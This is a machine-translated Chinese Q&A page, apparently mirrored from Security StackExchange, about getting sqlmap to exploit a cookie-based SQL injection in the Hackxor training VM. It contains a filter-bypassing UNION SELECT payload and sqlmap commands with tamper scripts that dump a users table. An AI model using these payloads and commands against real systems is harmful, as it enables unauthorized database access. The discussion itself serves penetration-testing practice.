首页
学习
活动
专区
圈层
工具
发布
社区首页 >问答首页 >Sqlmap不利用已验证的SQL注入

Sqlmap不利用已验证的SQL注入
EN

Security用户
提问于 2016-03-01 22:27:44
回答 2查看 3.4K关注 0票数 6

现在,我正在修改Hackxor VM (一种受限制的培训环境),并试图使用sqlmap来利用我可以手动利用的漏洞。

该漏洞位于cookie标头'userid‘参数中。该应用程序实现了一些SQLi过滤器来阻塞空间和一些SQL关键字,因此您必须稍微扭曲一下有效负载。

我可以成功地利用以下漏洞,使用HTTP代理在上述“userid”参数中注入以下有效负载:

代码语言:javascript
复制
71934/**/unUNIONion/**/seSELECTlect/**/*/**/from/**/users

然后,我尝试用sqlmap复制注入,但没有成功,使用以下命令:

代码语言:javascript
复制
sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" -p "userid" --level 5 --tamper "nonrecursivereplacement.py,space2comment.py" --sql-query="71934 UNION SELECT * from users"

我希望sqlmap只注入给定的查询并返回一个成功的漏洞,但是sqlmap尝试了很多查询,最后返回了'userid‘参数,而不是易受攻击的。

我做错了什么?

EN

回答 2

Security用户

发布于 2016-03-02 03:10:29

实际上我遇到了一个类似的问题。我认为我的语法是正确的,我仍然不知道我哪里出了问题,但我能够使用-r标志和提要sqlmap (捕获的header )作为参数。一旦我这样做,这个sqlmap就将该字段识别为易受攻击的区域(我已经知道它是脆弱的),并按照我最初的想法行事。

SQLmap POST参数‘txtLoginID’不可注入

希望这能有所帮助!

票数 1
EN

Security用户

发布于 2017-02-22 00:31:06

它需要这样工作

代码语言:javascript
复制
sqlmap -u "http://cloaknet:8080/proxypanel.jsp" --cookie="JSESSIONID=CA97BAFA78E01D237B86278E9DFE12C3; userid=71934" --level 5 --risk 3 -p "userid" --tamper=nonrecursivereplacement,space2comment --sql-query="71934 UNION SELECT * from users"
票数 1
EN
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:

https://security.stackexchange.com/questions/116192

复制
相关文章

相似问题

领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档